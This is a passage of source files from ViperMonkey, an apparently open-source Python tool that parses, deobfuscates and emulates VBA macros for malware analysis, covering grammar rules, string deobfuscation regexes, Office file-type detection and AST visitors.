/ "\" / "^" 84 | # NO-WS = 85 | # NO-LINE-CONTINUATION = 86 | # EOL = [WS] LINE-END / single-quote comment-body 87 | # EOS = *(EOL / ":") ;End Of Statement 88 | 89 | # End Of Line, INCLUDING line terminator 90 | EOL = Optional(comment_single_quote) + line_terminator 91 | 92 | # End Of Statement, INCLUDING line terminator 93 | EOS = Suppress(Optional(";")) + OneOrMore(EOL | Literal(':')) 94 | -------------------------------------------------------------------------------- /vipermonkey/core/curses_ascii.py: -------------------------------------------------------------------------------- 1 | """@package curses_ascii 2 | Various utility functions for working with characters. 3 | """ 4 | 5 | # Code borrowed from the Python standard library curses/ascii because it cannot 6 | # be imported on Windows: 7 | def _ctoi(c): 8 | if type(c) == type(""): 9 | return ord(c) 10 | else: 11 | return c 12 | 13 | def isalnum(c): return isalpha(c) or isdigit(c) 14 | def isalpha(c): return isupper(c) or islower(c) 15 | def isascii(c): return 0 <= _ctoi(c) <= 127 # ? 
16 | def isblank(c): return _ctoi(c) in (9, 32) 17 | def iscntrl(c): return 0 <= _ctoi(c) <= 31 or _ctoi(c) == 127 18 | def isdigit(c): return 48 <= _ctoi(c) <= 57 19 | def isgraph(c): return 33 <= _ctoi(c) <= 126 20 | def islower(c): return 97 <= _ctoi(c) <= 122 21 | def isprint(c): return 32 <= _ctoi(c) <= 126 22 | def ispunct(c): return isgraph(c) and not isalnum(c) 23 | def isspace(c): return _ctoi(c) in (9, 10, 11, 12, 13, 32) 24 | def isupper(c): return 65 <= _ctoi(c) <= 90 25 | def isxdigit(c): return isdigit(c) or \ 26 | (65 <= _ctoi(c) <= 70) or (97 <= _ctoi(c) <= 102) 27 | def isctrl(c): return 0 <= _ctoi(c) < 32 28 | def ismeta(c): return _ctoi(c) > 127 29 | 30 | -------------------------------------------------------------------------------- /vipermonkey/core/deobfuscation.py: -------------------------------------------------------------------------------- 1 | """@package deobfuscation 2 | 3 | Utility to help deobfuscate some VBA code before it gets processed. 4 | This can also be used by the user to help clean up code for analysis. 5 | 6 | WARNING: The regexes below are used to find common obfuscated VBA code and replace it 7 | with simpler equivalent code. They make no attempt at providing a complete/correct grammar. 8 | That is what vipermonkey is for.
9 | 10 | Author: Philippe Lagadec - http://www.decalage.info 11 | License: BSD, see source code or documentation 12 | 13 | Project Repository: 14 | https://github.com/decalage2/ViperMonkey 15 | """ 16 | 17 | from functools import reduce 18 | 19 | # attempt to import regex if it's installed, otherwise it will be ignored 20 | # (this is because regex does not work on PyPy2 on Windows) 21 | try: 22 | import regex 23 | REGEX = True 24 | except ImportError: 25 | # TODO: it would be good to log a warning 26 | REGEX = False 27 | 28 | from operator import xor 29 | 30 | from vipermonkey.core.vba_lines import vba_collapse_long_lines 31 | from vipermonkey.core.logger import log 32 | 33 | # === LICENSE ================================================================== 34 | 35 | # ViperMonkey is copyright (c) 2015-2021 Philippe Lagadec (http://www.decalage.info) 36 | # All rights reserved. 37 | # 38 | # Redistribution and use in source and binary forms, with or without modification, 39 | # are permitted provided that the following conditions are met: 40 | # 41 | # * Redistributions of source code must retain the above copyright notice, this 42 | # list of conditions and the following disclaimer. 43 | # * Redistributions in binary form must reproduce the above copyright notice, 44 | # this list of conditions and the following disclaimer in the documentation 45 | # and/or other materials provided with the distribution. 46 | # 47 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 48 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 49 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 50 | # DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 51 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 52 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 53 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 54 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 55 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 56 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 57 | 58 | # Only do this if the regex library was successfully imported. 59 | if REGEX: 60 | 61 | # language=PythonRegExp 62 | CHR = regex.compile('Chr\((?P<op>\d+)(\s+Xor\s+(?P<op>\d+))*\)', regex.IGNORECASE) 63 | # language=PythonRegExp 64 | STRING = regex.compile('(".*?"|\'.*?.\')') 65 | 66 | # Long run of Chr() and "string" concatenations. 67 | # e.g: Chr(71 Xor 18) & "2" & Chr(82 Xor 4) + "0" & Chr(70 Xor 15) & Chr(84 Xor 19) 68 | # NOTE: We are allowing the use of "+" because it has the same effect as "&" when dealing 69 | # with just strings, and operator precedence shouldn't matter in this case. 70 | # language=PythonRegExp 71 | CONCAT_RUN = regex.compile( 72 | '(?P<entry>{chr}|{string})(\s+[&+]\s+(?P<entry>{chr}|{string}))*'.format( 73 | chr=CHR.pattern, string=STRING.pattern)) 74 | 75 | # Long run of variable concatenation split across lines. 76 | # e.g. 77 | # a = '1' 78 | # a = a & '2' 79 | # a = a & '3' 80 | # language=PythonVerboseRegExp 81 | VAR_RUN = regex.compile(''' 82 | (?P<var>[A-Za-z][A-Za-z0-9]*)\s*?=\s*(?P<entry>.*?)[\r\n] # variable = * 83 | (\s*?(?P=var)\s*=\s*(?P=var)\s+&\s+(?P<entry>.*?)[\r\n])+ # variable = variable & * 84 | ''', regex.VERBOSE) 85 | 86 | 87 | def _replace_code(code, replacements): 88 | """Replaces code with new code. 89 | 90 | @param code (str) The code to replace. 91 | 92 | @param replacements (list) List of tuples containing (start, 93 | end, replacement). 94 | 95 | @return (str) The modified code.
96 | """ 97 | new_code = '' 98 | index = 0 99 | for start, end, code_string in sorted(replacements): 100 | new_code += code[index:start] + code_string 101 | index = end 102 | new_code += code[index:] 103 | return new_code 104 | 105 | 106 | def _replace_var_runs(code): 107 | """Collapse a run of 'a = a & ...' assignments into a single assignment. 108 | 109 | @param code (str) The code to replace. 110 | 111 | @return (str) The modified code. 112 | """ 113 | code_replacements = [] 114 | for match in VAR_RUN.finditer(code): 115 | code_string = '{var} = {value}{newline}'.format( 116 | var=match.group('var'), 117 | value=' & '.join(match.captures('entry')), 118 | newline=match.group(0)[-1] # reuse the \r or \n line ending found in the code. 119 | ) 120 | code_replacements.append((match.start(), match.end(), code_string)) 121 | return _replace_code(code, code_replacements) 122 | 123 | 124 | 125 | def _replace_concat_runs(code): 126 | """Fold a run of Chr() and string-literal concatenations into one string literal. 127 | 128 | @param code (str) The code to replace. 129 | 130 | @return (str) The modified code. 131 | """ 132 | code_replacements = [] 133 | for match in CONCAT_RUN.finditer(code): 134 | code_string = '' 135 | for entry in match.captures('entry'): 136 | sub_match = CHR.match(entry) 137 | if sub_match: 138 | character = chr(reduce(xor, map(int, sub_match.captures('op')))) 139 | # VBA escapes a double quote inside a string literal by doubling it. 140 | if character == '"': 141 | character = '""' 142 | code_string += character 143 | else: 144 | code_string += entry.strip('\'"') 145 | code_replacements.append((match.start(), match.end(), '"{}"'.format(code_string))) 146 | return _replace_code(code, code_replacements) 147 | 148 | 149 | def deobfuscate(code): 150 | """Deobfuscates VBA code. 151 | 152 | @param code (str) Obfuscated VBA code. 153 | 154 | @return (str) Deobfuscated code.
155 | 156 | """ 157 | code = vba_collapse_long_lines(code) 158 | if REGEX: 159 | code = _replace_var_runs(code) 160 | code = _replace_concat_runs(code) 161 | else: 162 | log.warning('regex package is not installed - impossible to deobfuscate') 163 | return code 164 | -------------------------------------------------------------------------------- /vipermonkey/core/filetype.py: -------------------------------------------------------------------------------- 1 | """ 2 | Check for Office file types 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | # Office magic numbers (hex byte values, written without zero padding to match get_1st_8_bytes()). 40 | magic_nums = { 41 | "office97" : "D0 CF 11 E0 A1 B1 1A E1", # Office 97 42 | "office2007" : "50 4B 3 4", # Office 2007+ (PKZip, bytes 50 4B 03 04) 43 | } 44 | 45 | # PE magic number. 46 | pe_magic_num = "4D 5A" 47 | 48 | def get_1st_8_bytes(fname, is_data): 49 | 50 | info = None 51 | is_data = (is_data or (len(fname) > 200)) 52 | if (not is_data): 53 | try: 54 | tmp = open(fname, 'rb') 55 | tmp.close() 56 | except: 57 | is_data = True 58 | if (not is_data): 59 | with open(fname, 'rb') as f: 60 | info = f.read(8) 61 | else: 62 | info = fname[:8] 63 | 64 | curr_magic = "" 65 | for b in info: 66 | curr_magic += hex(ord(b)).replace("0x", "").upper() + " " 67 | 68 | return curr_magic 69 | 70 | def is_pe_file(fname, is_data): 71 | """ 72 | Check to see if the given file is a PE executable. 73 | 74 | return - True if it is a PE file, False if not. 75 | """ 76 | 77 | # Read the 1st 8 bytes of the file. 78 | curr_magic = get_1st_8_bytes(fname, is_data) 79 | 80 | # See if we have the known magic #. 81 | return (curr_magic.startswith(pe_magic_num)) 82 | 83 | def is_office_file(fname, is_data): 84 | """ 85 | Check to see if the given file is in an MS Office file format. 86 | 87 | return - True if it is an Office file, False if not. 88 | """ 89 | 90 | # Read the 1st 8 bytes of the file. 91 | curr_magic = get_1st_8_bytes(fname, is_data) 92 | 93 | # See if we have 1 of the known magic #s.
94 | for typ in magic_nums.keys(): 95 | magic = magic_nums[typ] 96 | if (curr_magic.startswith(magic)): 97 | return True 98 | return False 99 | 100 | def is_office97_file(fname, is_data): 101 | 102 | # Read the 1st 8 bytes of the file. 103 | curr_magic = get_1st_8_bytes(fname, is_data) 104 | 105 | # See if we have the Office97 magic #. 106 | return (curr_magic.startswith(magic_nums["office97"])) 107 | 108 | def is_office2007_file(fname, is_data): 109 | 110 | # Read the 1st 8 bytes of the file. 111 | curr_magic = get_1st_8_bytes(fname, is_data) 112 | 113 | # See if we have the Office 2007 magic #. 114 | return (curr_magic.startswith(magic_nums["office2007"])) 115 | -------------------------------------------------------------------------------- /vipermonkey/core/from_unicode_str.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: VBA Library 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 
24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | __version__ = '0.02' 40 | 41 | class from_unicode_str(str): 42 | """ 43 | Marker class for strings created by StrConv() with the 44 | vbFromUnicode option. ViperMonkey currently assumes that, unless 45 | specifically noted, all strings are Unicode. This class is used to 46 | mark strings that are pure ASCII, not Unicode. 47 | """ 48 | pass 49 | -------------------------------------------------------------------------------- /vipermonkey/core/function_call_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting the names of all called functions 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis.
6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | from visitor import * 40 | 41 | class function_call_visitor(visitor): 42 | """ 43 | Collect the names of all called functions. 
44 | """ 45 | 46 | def __init__(self): 47 | self.called_funcs = set() 48 | self.visited = set() 49 | 50 | def visit(self, item): 51 | 52 | import statements 53 | import expressions 54 | import lib_functions 55 | 56 | if (item in self.visited): 57 | return False 58 | self.visited.add(item) 59 | if (isinstance(item, statements.Call_Statement)): 60 | if (not isinstance(item.name, expressions.MemberAccessExpression)): 61 | self.called_funcs.add(str(item.name)) 62 | if (isinstance(item, expressions.Function_Call)): 63 | self.called_funcs.add(str(item.name)) 64 | if (isinstance(item, statements.File_Open)): 65 | self.called_funcs.add("Open") 66 | if (isinstance(item, statements.Print_Statement)): 67 | self.called_funcs.add("Print") 68 | if (isinstance(item, lib_functions.Chr)): 69 | self.called_funcs.add("Chr") 70 | if (isinstance(item, lib_functions.Asc)): 71 | self.called_funcs.add("Asc") 72 | if (isinstance(item, lib_functions.StrReverse)): 73 | self.called_funcs.add("StrReverse") 74 | if (isinstance(item, lib_functions.Environ)): 75 | self.called_funcs.add("Environ") 76 | return True 77 | -------------------------------------------------------------------------------- /vipermonkey/core/function_defn_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting the names of locally defined functions 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 
18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | 40 | # === IMPORTS ================================================================ 41 | 42 | import os, sys 43 | 44 | # IMPORTANT: it must be possible to run vipermonkey tools directly as scripts 45 | # in any directory without installing with pip or setup.py, for tests during 46 | # development 47 | # In that case, relative imports are NOT usable. 
48 | # And to enable Python 2+3 compatibility, we need to use absolute imports, 49 | # so we add the vipermonkey parent folder to sys.path (absolute+normalized path): 50 | _thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__))) 51 | # print('_thismodule_dir = %r' % _thismodule_dir) 52 | # we are in vipermonkey/core 53 | _parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '../..')) 54 | # print('_parent_dir = %r' % _parent_dir) 55 | if _parent_dir not in sys.path: 56 | sys.path.insert(0, _parent_dir) 57 | 58 | from vipermonkey.core import * 59 | 60 | 61 | class function_defn_visitor(visitor): 62 | """ 63 | Collect the names of all locally declared functions. 64 | """ 65 | 66 | def __init__(self): 67 | self.funcs = set() 68 | self.func_objects = set() 69 | self.visited = set() 70 | 71 | def visit(self, item): 72 | if (item in self.visited): 73 | return False 74 | self.visited.add(item) 75 | if ((isinstance(item, procedures.Sub)) or 76 | (isinstance(item, procedures.Function)) or 77 | (isinstance(item, procedures.PropertyLet))): 78 | self.funcs.add(str(item.name)) 79 | self.func_objects.add(item) 80 | return True 81 | -------------------------------------------------------------------------------- /vipermonkey/core/function_import_visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Visitor for collecting the names of functions imported from DLLs 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis.
6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | from visitor import * 40 | from procedures import * 41 | 42 | class function_import_visitor(visitor): 43 | """ 44 | Collect the names and aliases of all functions imported from DLLs. 
45 | """ 46 | 47 | def __init__(self): 48 | self.names = set() 49 | self.aliases = set() 50 | self.funcs = {} 51 | self.visited = set() 52 | 53 | def visit(self, item): 54 | if (item in self.visited): 55 | return False 56 | self.visited.add(item) 57 | if (isinstance(item, External_Function)): 58 | self.funcs[str(item.name)] = str(item.alias_name) 59 | self.names.add(str(item.alias_name)) 60 | self.aliases.add(str(item.name)) 61 | return True 62 | -------------------------------------------------------------------------------- /vipermonkey/core/identifiers.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA Grammar - Identifiers 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 
28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | import re 40 | 41 | __version__ = '0.02' 42 | 43 | # ------------------------------------------------------------------------------ 44 | # TODO: 45 | 46 | # --- IMPORTS ------------------------------------------------------------------ 47 | 48 | from pyparsing import * 49 | from reserved import * 50 | from logger import log 51 | 52 | # TODO: reduce this list when corresponding statements are implemented 53 | # Handling whitespace in the RE version of reserved_keywords is a nightmare. Track this with a keyword list. 
54 | reserved_keywords = CaselessKeyword("ChrB") | \ 55 | CaselessKeyword("ChrB") | \ 56 | CaselessKeyword("ChrW") | \ 57 | CaselessKeyword("Asc") | \ 58 | CaselessKeyword("Case") | \ 59 | CaselessKeyword("On") | \ 60 | CaselessKeyword("Sub") | \ 61 | CaselessKeyword("If") | \ 62 | CaselessKeyword("Then") | \ 63 | CaselessKeyword("For") | \ 64 | CaselessKeyword("Next") | \ 65 | CaselessKeyword("Public") | \ 66 | CaselessKeyword("Private") | \ 67 | CaselessKeyword("Declare") | \ 68 | CaselessKeyword("Function") | \ 69 | CaselessKeyword("To") 70 | # CaselessKeyword("End") | \ 71 | 72 | strict_reserved_keywords = reserved_keywords | \ 73 | Regex(re.compile('Open', re.IGNORECASE)) | \ 74 | Regex(re.compile('While', re.IGNORECASE)) 75 | 76 | # --- IDENTIFIER ------------------------------------------------------------- 77 | 78 | # TODO: see MS-VBAL 3.3.5 page 33 79 | # 3.3.5 Identifier Tokens 80 | # 81 | # MS-GRAMMAR: Latin-identifier = first-Latin-identifier-character *subsequent-Latin-identifier-character 82 | # MS-GRAMMAR: first-Latin-identifier-character = (%x0041-005A / %x0061-007A) ; A-Z / a-z 83 | # MS-GRAMMAR: subsequent-Latin-identifier-character = first-Latin-identifier-character / DIGIT / %x5F ; underscore 84 | # MS-GRAMMAR: identifier = expression 85 | 86 | general_identifier = Word(initChars=alphas + alphas8bit + '_' + '?', bodyChars=alphanums + '_' + '?' + alphas8bit) + \ 87 | Suppress(Optional("^")) + Suppress(Optional("%")) + Suppress(Optional("!...")) 88 | 89 | # MS-GRAMMAR: lex-identifier = Latin-identifier / codepage-identifier / Japanese-identifier / 90 | # MS-GRAMMAR: Korean-identifier / simplified-Chinese-identifier / traditional-Chinese-identifier 91 | # TODO: add other identifier types 92 | lex_identifier = general_identifier | Regex(r"%\w+%") | "..." 
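# Illustrative sketch only, not used by the grammar in this module: the strict
# MS-VBAL Latin-identifier rule quoted above (first character A-Z / a-z,
# then letters, digits or underscore), written as a stdlib `re` pattern so it
# can be compared with general_identifier. The helper names are hypothetical.
# general_identifier is deliberately looser (it also accepts '_', '?' and
# 8-bit letters as the first character), so the two can disagree on "_x".
import re

_LATIN_IDENTIFIER_SKETCH = re.compile(r"[A-Za-z][A-Za-z0-9_]*\Z")


def _is_latin_identifier_sketch(name):
    """Return True if name matches the strict MS-VBAL Latin-identifier rule."""
    # re.match() anchors at the start of the string; the trailing \Z anchors the end.
    return _LATIN_IDENTIFIER_SKETCH.match(name) is not None

# Usage: _is_latin_identifier_sketch("myVar_1") is True, while "1abc" and
# "_abc" are rejected, even though general_identifier accepts "_abc".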
